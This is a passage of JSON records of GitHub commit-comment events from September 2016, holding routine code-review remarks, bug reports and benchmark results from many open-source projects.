fceJlIRbetbcQDM5gclunNks5qm7JRgaJpZM4J0xFI>.\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IAHM-COL/KingAir-350/commit/a5e31b6e2c08e917392ec0f273332f4cfac29cea#commitcomment-18895792>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AO4tlL4iMk-kNfEcXEwx5M3HGMXr8cQwks5qm7O2gaJpZM4J0xFI>\n> .\n>\n"}},"created_at":"2016-09-05T06:27:53Z"}
{"id":"4515289101","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18895867,"position":null,"line":null,"path":null,"commit_id":"af4dd62506a8495497014343fb93f0c2228f3976","created_at":"2016-09-05T06:28:38Z","updated_at":"2016-09-05T06:28:38Z","body":"pgo-builds on win7 based on bench 7553379 (Change exclusion key setup)\r\n\r\ncutechess-cli.exe -repeat -rounds 60000 -sprt elo0=0 elo1=5 alpha=0.05 beta=0.05 -resign movecount=3 score=400 -draw movenumber=34 movecount=8 score=20 -concurrency 6 -openings file=2moves_v1.pgn format=pgn order=random plies=16 -engine name=new cmd=stockfish -engine name=base cmd=base -each proto=uci tc=60+0.6 option.Threads=1 option.Hash=64\r\n\r\n...\r\nScore of new vs base: 1177 - 1108 - 6102  [0.504] 8387 \r\n..."}},"created_at":"2016-09-05T06:28:38Z"}
{"id":"4515291904","type":"CommitCommentEvent","actor":{"login":"cmoulliard"},"repo":{"name":"asciidoctor/asciidoctor.js"},"payload":{"comment":{"id":18895884,"position":null,"line":null,"path":null,"commit_id":"5eab5b41623a0e188cf7e50a8fd500921602347a","created_at":"2016-09-05T06:29:45Z","updated_at":"2016-09-05T06:29:45Z","body":"I have done a test with this commit but the slide revealjs example doesn't work anymore as the jade.js file is defined relatively to the parent folder `../jade.js` & by consequence the jade var is undefined\r\n\r\n![screenshot 2016-09-05 08 27 45](https://cloud.githubusercontent.com/assets/463790/18239037/cb398f6e-7342-11e6-9294-783ecfed503e.png)\r\n"}},"created_at":"2016-09-05T06:29:45Z"}
{"id":"4515295165","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18895896,"position":null,"line":null,"path":null,"commit_id":"a5e31b6e2c08e917392ec0f273332f4cfac29cea","created_at":"2016-09-05T06:31:01Z","updated_at":"2016-09-05T06:31:01Z","body":"I may have mixed up with other aircraft, not sure.."}},"created_at":"2016-09-05T06:31:01Z"}
{"id":"4515297185","type":"CommitCommentEvent","actor":{"login":"limikael"},"repo":{"name":"afragen/github-updater"},"payload":{"comment":{"id":18895900,"position":null,"line":null,"path":null,"commit_id":"97b9bf807042c4c0c34d770d2730cc421a5b5017","created_at":"2016-09-05T06:31:51Z","updated_at":"2016-09-05T06:31:51Z","body":"Thanks! I'm honored! "}},"created_at":"2016-09-05T06:31:51Z"}
{"id":"4515298810","type":"CommitCommentEvent","actor":{"login":"smoker1977"},"repo":{"name":"smoker1977/first-pr"},"payload":{"comment":{"id":18895903,"position":12,"line":921,"path":"index.html","commit_id":"97c46cf5945b863e5bcfbabe100852ef63279fa4","created_at":"2016-09-05T06:32:30Z","updated_at":"2016-09-05T06:32:30Z","body":"コメントの位置を最終行に移動しました。\r\nいかがでしょうか？"}},"created_at":"2016-09-05T06:32:30Z"}
{"id":"4515301207","type":"CommitCommentEvent","actor":{"login":"magthe"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18895907,"position":null,"line":null,"path":null,"commit_id":"9066d073b2e46715b8ecd855b96399a33495bff1","created_at":"2016-09-05T06:33:26Z","updated_at":"2016-09-05T06:33:26Z","body":"At least one remains (at least if my guess at what this change fixes is correct):\r\n\r\n    Error (use-package): helm-gtags :init: Symbol's value as variable is void: spacemacs-jump-handlers-tcl-mode\r\n"}},"created_at":"2016-09-05T06:33:26Z"}
{"id":"4515301559","type":"CommitCommentEvent","actor":{"login":"renfeng"},"repo":{"name":"abioteau/android-repository"},"payload":{"comment":{"id":18895908,"position":null,"line":null,"path":null,"commit_id":"f0f57609ca54ca352fd08330e58eb81364fed4e5","created_at":"2016-09-05T06:33:36Z","updated_at":"2016-09-05T06:33:36Z","body":"May I ask why revert this feature? Does obsolete mean anything? Or, was it just an intention to collect all artifacts? Thanks."}},"created_at":"2016-09-05T06:33:36Z"}
{"id":"4515303361","type":"CommitCommentEvent","actor":{"login":"LittleHelicase"},"repo":{"name":"BuggyOrg/graphtools"},"payload":{"comment":{"id":18895911,"position":17,"line":17,"path":"draft/sampleQueries.js","commit_id":"4d2ad7efa89337ad38a4a521b5a82d2c9ecd9d53","created_at":"2016-09-05T06:34:17Z","updated_at":"2016-09-05T06:34:17Z","body":"Yeah, but we need specialized algorithms for them. Ignoring recursion boundaries seems very wrong to me."}},"created_at":"2016-09-05T06:34:17Z"}
{"id":"4515303666","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18895913,"position":null,"line":null,"path":null,"commit_id":"465a9c3781c1a4f9a943ebde5c2834bc40934ce5","created_at":"2016-09-05T06:34:24Z","updated_at":"2016-09-05T06:34:24Z","body":"What is a script weapon at all? "}},"created_at":"2016-09-05T06:34:24Z"}
{"id":"4515305318","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18895918,"position":null,"line":null,"path":null,"commit_id":"465a9c3781c1a4f9a943ebde5c2834bc40934ce5","created_at":"2016-09-05T06:35:04Z","updated_at":"2016-09-05T06:35:04Z","body":"As always, whatever it might be, I hate the name "}},"created_at":"2016-09-05T06:35:04Z"}
{"id":"4515306775","type":"CommitCommentEvent","actor":{"login":"syobochim"},"repo":{"name":"backpaper0/agolla"},"payload":{"comment":{"id":18895922,"position":null,"line":null,"path":null,"commit_id":"9428be751984713fb8358cba9cea896c69e87289","created_at":"2016-09-05T06:35:34Z","updated_at":"2016-09-05T06:35:34Z","body":"それでした…！！((( ´ºωº `)))"}},"created_at":"2016-09-05T06:35:34Z"}
{"id":"4515306874","type":"CommitCommentEvent","actor":{"login":"kover"},"repo":{"name":"mosh-hamedani/angular2-course"},"payload":{"comment":{"id":18895923,"position":55,"line":90,"path":"app/posts.component.ts","commit_id":"9aba781de7f12ed74870d36516ec7001397638de","created_at":"2016-09-05T06:35:37Z","updated_at":"2016-09-05T06:35:37Z","body":"For conciseness:\r\n\r\n`return this.posts.filter(\r\n      (element, idx) => idx >= startIndex && idx < endIndex\r\n    );`"}},"created_at":"2016-09-05T06:35:37Z"}
{"id":"4515308532","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18895925,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-05T06:36:17Z","updated_at":"2016-09-05T06:36:17Z","body":"Perhaps this is better discussed in a full issue for future reference... #857"}},"created_at":"2016-09-05T06:36:17Z"}
{"id":"4515309351","type":"CommitCommentEvent","actor":{"login":"STJEREM"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18895927,"position":null,"line":null,"path":null,"commit_id":"fc10588b9f953c8c2eb3147104d55cc833c0650b","created_at":"2016-09-05T06:36:35Z","updated_at":"2016-09-05T06:36:35Z","body":"I can confirm that this is working on Linux. (Tested on Arch)"}},"created_at":"2016-09-05T06:36:35Z"}
{"id":"4515314500","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":18895938,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-05T06:38:35Z","updated_at":"2016-09-05T06:38:35Z","body":"crash logs?"}},"created_at":"2016-09-05T06:38:35Z"}
{"id":"4515317542","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18895948,"position":24,"line":24,"path":"app/Http/Controllers/DictionaryController.php","commit_id":"244b330c847b3051e27dcb31c22d35be6c287fb0","created_at":"2016-09-05T06:39:43Z","updated_at":"2016-09-05T06:39:43Z","body":"часть с проверкой, что это пост запрос, надо либо выпилить, либо поправить, т.к. сейчас независимо от того пост или нет все равно код работает :) но если пост будет вар_дамп выводиться в ответе"}},"created_at":"2016-09-05T06:39:43Z"}
{"id":"4515319969","type":"CommitCommentEvent","actor":{"login":"shajoezhu"},"repo":{"name":"scrm/scrm"},"payload":{"comment":{"id":18895955,"position":10,"line":10,"path":".travis/test_converage.sh","commit_id":"43b50261dabf4df45fe6842a7b07b198d634950b","created_at":"2016-09-05T06:40:38Z","updated_at":"2016-09-05T06:40:38Z","body":"I see, this is how you suppose to do it :+1"}},"created_at":"2016-09-05T06:40:38Z"}
{"id":"4515321331","type":"CommitCommentEvent","actor":{"login":"syl20bnr"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18895962,"position":null,"line":null,"path":null,"commit_id":"9066d073b2e46715b8ecd855b96399a33495bff1","created_at":"2016-09-05T06:41:11Z","updated_at":"2016-09-05T06:41:11Z","body":"I just push commit https://github.com/syl20bnr/spacemacs/commit/317694b with hopefully the last remaining (those with helm-gtags support)."}},"created_at":"2016-09-05T06:41:11Z"}
{"id":"4515322488","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18895969,"position":null,"line":null,"path":null,"commit_id":"4dc4653cfe8cba80e67c0b7eeb3cfe67f56d6147","created_at":"2016-09-05T06:41:36Z","updated_at":"2016-09-05T06:41:36Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-05T06:41:36Z"}
{"id":"4515323039","type":"CommitCommentEvent","actor":{"login":"lvgilmore"},"repo":{"name":"yuliaTev/LinuxExercise"},"payload":{"comment":{"id":18895971,"position":16,"line":16,"path":"src/Disks.py","commit_id":"7d0032e9a65a788579aba1de406dac20256cff78","created_at":"2016-09-05T06:41:49Z","updated_at":"2016-09-05T06:41:49Z","body":"grep /dev/\" + device + \":"}},"created_at":"2016-09-05T06:41:49Z"}
{"id":"4515323130","type":"CommitCommentEvent","actor":{"login":"addibble"},"repo":{"name":"addibble/HoverboardController"},"payload":{"comment":{"id":18895972,"position":null,"line":null,"path":null,"commit_id":"1013f1d3170261a54cf73b8e50823cb9649c86fc","created_at":"2016-09-05T06:41:52Z","updated_at":"2016-09-05T06:41:52Z","body":"Does terminalbpp support 9-bit serial? If not you probably won't have any\nluck using it with the hoverboard. I think there might be major limitations\non 9-bit serial on most POSIX/PC platforms. I did get it working on a\nTeensy which has hardware 9-bit uart that supports weird baud rates. Good\nluck!\n\nOn Sun, Sep 4, 2016 at 6:39 AM, om89 <notifications@github.com> wrote:\n\n> Thank addiable for your project. I'm currently another Chinese hoverboard\n> 6.5\" wheel version. It's pinout at J1 as +12v, USART2_Rx, USART_TX, GND.\n> I'm still check the baudrate and the meaning of feedback from gyro-board to\n> main board. Btw, I found a UART terminal software that can customize the\n> baudrate.\n> https://sites.google.com/site/terminalbpp/\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/addibble/HoverboardController/commit/1013f1d3170261a54cf73b8e50823cb9649c86fc#commitcomment-18893151>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADcvUvtIgoEHrHyMnpwQgCQD994PnE0ks5qmsoJgaJpZM4JTn4h>\n> .\n>\n"}},"created_at":"2016-09-05T06:41:52Z"}
{"id":"4515323272","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"KristofferC/PimpMyREPL.jl"},"payload":{"comment":{"id":18895974,"position":null,"line":null,"path":null,"commit_id":"3c3b2b2970c830ce015ec6f76dc82ea509bc1e57","created_at":"2016-09-05T06:41:55Z","updated_at":"2016-09-05T06:41:55Z","body":"I had the problem that the `wait` locked Julia indefinitely. Maybe it makes sense to spawn the `wait` asynchronously.  This pipe business is pretty annoying :P"}},"created_at":"2016-09-05T06:41:55Z"}
{"id":"4515324994","type":"CommitCommentEvent","actor":{"login":"lvgilmore"},"repo":{"name":"yuliaTev/LinuxExercise"},"payload":{"comment":{"id":18895978,"position":17,"line":17,"path":"src/Disks.py","commit_id":"7d0032e9a65a788579aba1de406dac20256cff78","created_at":"2016-09-05T06:42:31Z","updated_at":"2016-09-05T06:42:31Z","body":"block/\" + device + \"/device"}},"created_at":"2016-09-05T06:42:31Z"}
{"id":"4515329957","type":"CommitCommentEvent","actor":{"login":"chamnit"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":18895989,"position":null,"line":null,"path":null,"commit_id":"e0bb76032c5ec682da1e0d58214cb02840a6593b","created_at":"2016-09-05T06:44:24Z","updated_at":"2016-09-05T06:44:24Z","body":"I'd like to suggest that using integer calculations in the planner isn't a great idea. Grbl doesn't do this intentionally because you eliminate the risk of exceeding the integer max value and maintaining numeric precision throughout. This precision issue can get you in trouble quickly and can be hard to debug. \r\n\r\nSure you can perfectly tune everything for a machine or two, but this leads to making the code obsolete every time you alter something. \r\n\r\nAlso, over sampling the Bresenham is a good idea. Grbl does it in the stepper algorithm as something called AMASS. One thing I learned from installing it is that you don't get much benefit going from 4x to 8x over sampling. It's a few percent improvement. So if you have performance issues, I'd look at reducing to 4x. \r\n\r\nLastly, in terms of the planner, Grbl has already improved its performance drastically to guarantee a new plan within 4ms. And computes parts of the plan that can changes. Meaning it typically computes only the latter third of the planner at any given time. You can recoup nearly all of the computational overhead by using floats if use it. \r\n\r\nJust make sure to attribute my copyrights correctly. Marlin has always copied large parts of my Grbl code without proper attributions. Thanks. "}},"created_at":"2016-09-05T06:44:24Z"}
{"id":"4515335398","type":"CommitCommentEvent","actor":{"login":"khoaakt"},"repo":{"name":"os-js/OS.js"},"payload":{"comment":{"id":18896003,"position":null,"line":null,"path":null,"commit_id":"3a6bff59153169c2a50f9999764b7ebcdf669669","created_at":"2016-09-05T06:46:25Z","updated_at":"2016-09-05T06:46:25Z","body":"Nice 👍 "}},"created_at":"2016-09-05T06:46:25Z"}
{"id":"4515335895","type":"CommitCommentEvent","actor":{"login":"jtarchie"},"repo":{"name":"eroad/pullrequest-resource"},"payload":{"comment":{"id":18896005,"position":null,"line":null,"path":null,"commit_id":"655d4fbb53ca00e94a2394af1608b930bf303fc0","created_at":"2016-09-05T06:46:35Z","updated_at":"2016-09-05T06:46:35Z","body":"Where is it documented that head ref is only for master?"}},"created_at":"2016-09-05T06:46:35Z"}
{"id":"4515336016","type":"CommitCommentEvent","actor":{"login":"mhugent"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18896007,"position":null,"line":null,"path":null,"commit_id":"f6aad8bad6db72d0b1e573998ac7dcb2405dce55","created_at":"2016-09-05T06:46:38Z","updated_at":"2016-09-05T06:46:38Z","body":"Bug https://hub.qgis.org/issues/15522 has been bisected down to this commit"}},"created_at":"2016-09-05T06:46:38Z"}
{"id":"4515338513","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18896013,"position":null,"line":null,"path":null,"commit_id":"530ed4b3b498ee95078522eb77b1377e3977ca49","created_at":"2016-09-05T06:47:32Z","updated_at":"2016-09-05T06:47:32Z","body":"The problem is that there may be a delay with PVEH so if you and another player remove the item at the same time then even checking it every 1/10th of a second is probably not good enough. setting a claimed variable may not work since the wrecks are local. The problem that epoch 1.0.5.1 didn't have that we have now is gems are given from mines and they actually have a value, so duping of remove.sqf output shouldn't be possible and this is a very obvious way of duping."}},"created_at":"2016-09-05T06:47:32Z"}
{"id":"4515344424","type":"CommitCommentEvent","actor":{"login":"eLBati"},"repo":{"name":"eLBati/multi-company"},"payload":{"comment":{"id":18896027,"position":null,"line":null,"path":null,"commit_id":"4f1b33daeb24187ff9d035837e94db47a3506d46","created_at":"2016-09-05T06:49:31Z","updated_at":"2016-09-05T06:49:31Z","body":"Thanks @jfpla , please take a look at https://github.com/eLBati/multi-company/commit/60da725ab99543ccb4e8fcff7b7fcbdba6ac88c4"}},"created_at":"2016-09-05T06:49:31Z"}
{"id":"4515345613","type":"CommitCommentEvent","actor":{"login":"oscargus"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18896029,"position":15,"line":40,"path":"src/main/java/net/sf/jabref/model/entry/BibEntry.java","commit_id":"a9eb978aef76717e1983eb0a2335e7d0d5af42c4","created_at":"2016-09-05T06:49:58Z","updated_at":"2016-09-05T06:49:58Z","body":"This will ruin the chance of iterating over all the fields in a way that makes sense. Also, there is code in layout that needs this. "}},"created_at":"2016-09-05T06:49:58Z"}
{"id":"4515346415","type":"CommitCommentEvent","actor":{"login":"dmartin54"},"repo":{"name":"dmartin54/dmartin54"},"payload":{"comment":{"id":18896031,"position":null,"line":null,"path":null,"commit_id":"feb2c5b120c44f1423ee01ac61e36fde2fb8ae38","created_at":"2016-09-05T06:50:16Z","updated_at":"2016-09-05T06:50:16Z","body":"Assignment1"}},"created_at":"2016-09-05T06:50:16Z"}
{"id":"4515354238","type":"CommitCommentEvent","actor":{"login":"PabstMirror"},"repo":{"name":"acemod/ACE3"},"payload":{"comment":{"id":18896042,"position":null,"line":null,"path":null,"commit_id":"3ba08cd6bbe29506e207c284ab43bb15236ed731","created_at":"2016-09-05T06:53:05Z","updated_at":"2016-09-05T06:53:05Z","body":"I don't think it would be a problem, but this is from the dev version of cba and not 3.0\r\n\r\nhttps://github.com/CBATeam/CBA_A3/blob/v3.0.0.160713/addons/main/script_macros_common.hpp"}},"created_at":"2016-09-05T06:53:05Z"}
{"id":"4515355291","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896049,"position":21,"line":21,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T06:53:29Z","updated_at":"2016-09-05T06:53:29Z","body":"Minor issue - we get an invalid board if input begins or ends with a new line:\r\n```python\r\ninput = \"\"\"\r\n...\r\n.X.\r\nX.X\r\n\"\"\"\r\n```\r\n\r\nWould result in a board like `['', '...', '.X.', 'X.X', '']`."}},"created_at":"2016-09-05T06:53:29Z"}
{"id":"4515356862","type":"CommitCommentEvent","actor":{"login":"oscargus"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18896052,"position":16,"line":41,"path":"src/main/java/net/sf/jabref/model/entry/BibEntry.java","commit_id":"a9eb978aef76717e1983eb0a2335e7d0d5af42c4","created_at":"2016-09-05T06:54:01Z","updated_at":"2016-09-05T06:54:01Z","body":"If you had read the code you would see that there is a single use of `TYPE_HEADER` that use it in a way that can be replaced by `getType`. That is in `BibEntry` so would still work."}},"created_at":"2016-09-05T06:54:01Z"}
{"id":"4515357446","type":"CommitCommentEvent","actor":{"login":"michealzh"},"repo":{"name":"guzzle/guzzle"},"payload":{"comment":{"id":18896053,"position":null,"line":null,"path":null,"commit_id":"9d521b23146cb6cedd772770a2617fd6cbdb1596","created_at":"2016-09-05T06:54:14Z","updated_at":"2016-09-05T06:54:14Z","body":"👍"}},"created_at":"2016-09-05T06:54:14Z"}
{"id":"4515359765","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"Aberhart-school/abe-site"},"payload":{"comment":{"id":18896060,"position":null,"line":null,"path":null,"commit_id":"c950db393210fd70dabf3bc03ec766c3b63a6f5d","created_at":"2016-09-05T06:55:06Z","updated_at":"2016-09-05T06:55:06Z","body":"Also #183 and #184"}},"created_at":"2016-09-05T06:55:06Z"}
{"id":"4515360353","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18896064,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-05T06:55:17Z","updated_at":"2016-09-05T06:55:17Z","body":"@nyalldawson Cleaned up code committed."}},"created_at":"2016-09-05T06:55:17Z"}
{"id":"4515362643","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"Aberhart-school/abe-site"},"payload":{"comment":{"id":18896069,"position":null,"line":null,"path":null,"commit_id":"b372994f2945be2703888eb1d26ef30a40339fc0","created_at":"2016-09-05T06:56:01Z","updated_at":"2016-09-05T06:56:01Z","body":"This created #178"}},"created_at":"2016-09-05T06:56:01Z"}
{"id":"4515364840","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18896074,"position":null,"line":null,"path":null,"commit_id":"f2877a9ba132df65c17bebfbdfcc8f138a6d6d8a","created_at":"2016-09-05T06:56:48Z","updated_at":"2016-09-05T06:56:48Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=936)"}},"created_at":"2016-09-05T06:56:48Z"}
{"id":"4515369497","type":"CommitCommentEvent","actor":{"login":"gotlieb"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":18896083,"position":401,"line":365,"path":"alpha/apps/kaltura/lib/kEntitlementUtils.php","commit_id":"41d553c6b0c5283ed47859ee974e535cd88288bd","created_at":"2016-09-05T06:58:22Z","updated_at":"2016-09-05T06:58:22Z","body":"take another look"}},"created_at":"2016-09-05T06:58:22Z"}
{"id":"4515369633","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896085,"position":53,"line":53,"path":"test_tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T06:58:24Z","updated_at":"2016-09-05T06:58:24Z","body":"This is overly complicated.\r\n\r\nA simpler, more readable test suite would define one input and test it in every test function.\r\n\r\nThis keeps the relevant code in one place, doesn't fail the entire suite if one test fails and is easier to extend with future tests."}},"created_at":"2016-09-05T06:58:24Z"}
{"id":"4515370953","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896088,"position":9,"line":9,"path":"test_tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T06:58:51Z","updated_at":"2016-09-05T06:58:51Z","body":"The docstrings in this file don't provide useful information."}},"created_at":"2016-09-05T06:58:51Z"}
{"id":"4515371260","type":"CommitCommentEvent","actor":{"login":"catfan"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18896090,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-05T06:58:57Z","updated_at":"2016-09-05T06:58:57Z","body":"@KirDE \r\nNo, it did not remove. You can use more wildcard syntax from now.\r\n\r\nFor `Lon%`, you can use this:\r\n```php\r\n$database->select(\"person\", \"id\", [\r\n\t\"city[~]\" => \"Lon%\"\r\n]);\r\n```"}},"created_at":"2016-09-05T06:58:57Z"}
{"id":"4515372534","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18896096,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-05T06:59:23Z","updated_at":"2016-09-05T06:59:23Z","body":"@nyalldawson OK, next problem. On the line layer some labels are missing (Noord-Holland) as opposed to the polygon layer. When I move down and right, so the polyline 'Noord-Holland' is not visually interrupted, the labels appear. Any ideas?"}},"created_at":"2016-09-05T06:59:23Z"}
{"id":"4515374929","type":"CommitCommentEvent","actor":{"login":"oscargus"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18896100,"position":15,"line":40,"path":"src/main/java/net/sf/jabref/model/entry/BibEntry.java","commit_id":"a9eb978aef76717e1983eb0a2335e7d0d5af42c4","created_at":"2016-09-05T07:00:13Z","updated_at":"2016-09-05T07:00:13Z","body":"Sorry, but this is crap. I vote for reversal. Read the code and you will see that this is not possible to enforce. Not even close. These constants are used in sorting, entry editor, tables, ... and it is not possible to use get/set/clear as the use case is to figure out if it is that field. One thing if they were fields in `BibEntry` and not part of the field map, but I do not think we want to get back there..."}},"created_at":"2016-09-05T07:00:13Z"}
{"id":"4515376312","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18896120,"position":null,"line":null,"path":null,"commit_id":"f1a23c4a0320b6b0a23de44e4a00f8894deeac79","created_at":"2016-09-05T07:00:36Z","updated_at":"2016-09-05T07:00:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4LbcZdDE&#x2F;22-gulp-and-rename-classes\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Gulp and rename classes</a>"}},"created_at":"2016-09-05T07:00:36Z"}
{"id":"4515378807","type":"CommitCommentEvent","actor":{"login":"cmoulliard"},"repo":{"name":"asciidoctor/asciidoctor.js"},"payload":{"comment":{"id":18896123,"position":null,"line":null,"path":null,"commit_id":"848ef43cef3ce2fdcb09754a56ee537c8928b0af","created_at":"2016-09-05T07:01:23Z","updated_at":"2016-09-05T07:01:23Z","body":"Thx. Problem solved.\r\n\r\n![screenshot 2016-09-05 09 00 41](https://cloud.githubusercontent.com/assets/463790/18239702/503e9eb2-7347-11e6-9e9b-6fb6296e641d.png)\r\n"}},"created_at":"2016-09-05T07:01:23Z"}
{"id":"4515380460","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896134,"position":40,"line":40,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:01:54Z","updated_at":"2016-09-05T07:01:54Z","body":"We can detect a win state at every iteration of this list comprehension.\r\nAfter the first win state is found, building the rest is wasted effort."}},"created_at":"2016-09-05T07:01:54Z"}
{"id":"4515386915","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896141,"position":21,"line":21,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:04:00Z","updated_at":"2016-09-05T07:04:00Z","body":"Well done not splitting each input row into its own list."}},"created_at":"2016-09-05T07:04:00Z"}
{"id":"4515386960","type":"CommitCommentEvent","actor":{"login":"KirDE"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18896142,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-05T07:04:01Z","updated_at":"2016-09-05T07:04:01Z","body":"In this case, Can you ajust Dokumentation? Thank  you "}},"created_at":"2016-09-05T07:04:01Z"}
{"id":"4515395375","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896165,"position":44,"line":44,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:06:39Z","updated_at":"2016-09-05T07:06:39Z","body":"Given the later checks, this one doesn't achieve anything - if `X` or, `X` *and* `O`, then the next check catches it.\r\n"}},"created_at":"2016-09-05T07:06:39Z"}
{"id":"4515397058","type":"CommitCommentEvent","actor":{"login":"catfan"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18896179,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-05T07:07:16Z","updated_at":"2016-09-05T07:07:16Z","body":"http://medoo.in/api/where"}},"created_at":"2016-09-05T07:07:16Z"}
{"id":"4515398002","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":18896183,"position":null,"line":null,"path":null,"commit_id":"590e9517398c4d442bcf125421353b4b338217d1","created_at":"2016-09-05T07:07:35Z","updated_at":"2016-09-05T07:07:35Z","body":"https://github.com/ossrs/state-threads/issues/2"}},"created_at":"2016-09-05T07:07:35Z"}
{"id":"4515398901","type":"CommitCommentEvent","actor":{"login":"miigotu"},"repo":{"name":"snamds/SickRage"},"payload":{"comment":{"id":18896184,"position":7,"line":348,"path":"sickbeard/common.py","commit_id":"196d0ebaddb2f501adc39a942acf9e50a38119ab","created_at":"2016-09-05T07:07:53Z","updated_at":"2016-09-05T07:07:53Z","body":"You could have just changed this one line I think, to:\r\n`if ep.scan == 'p' or not ep.scan:`"}},"created_at":"2016-09-05T07:07:53Z"}
{"id":"4515400816","type":"CommitCommentEvent","actor":{"login":"MoKob"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":18896190,"position":null,"line":null,"path":null,"commit_id":"a4f94993059dc5120ce6296c42ef472a07111f2e","created_at":"2016-09-05T07:08:28Z","updated_at":"2016-09-05T07:08:28Z","body":"I have no idea how this part changed. Must have copied the values back in from a previous version. Thank you for catching this regression. Merging."}},"created_at":"2016-09-05T07:08:28Z"}
{"id":"4515409892","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18896225,"position":null,"line":null,"path":null,"commit_id":"4745341c69772de5ddfee1f68e7421ad9d772b82","created_at":"2016-09-05T07:11:27Z","updated_at":"2016-09-05T07:11:27Z","body":"I suspected the problem wasn't (completely) deterministic..."}},"created_at":"2016-09-05T07:11:27Z"}
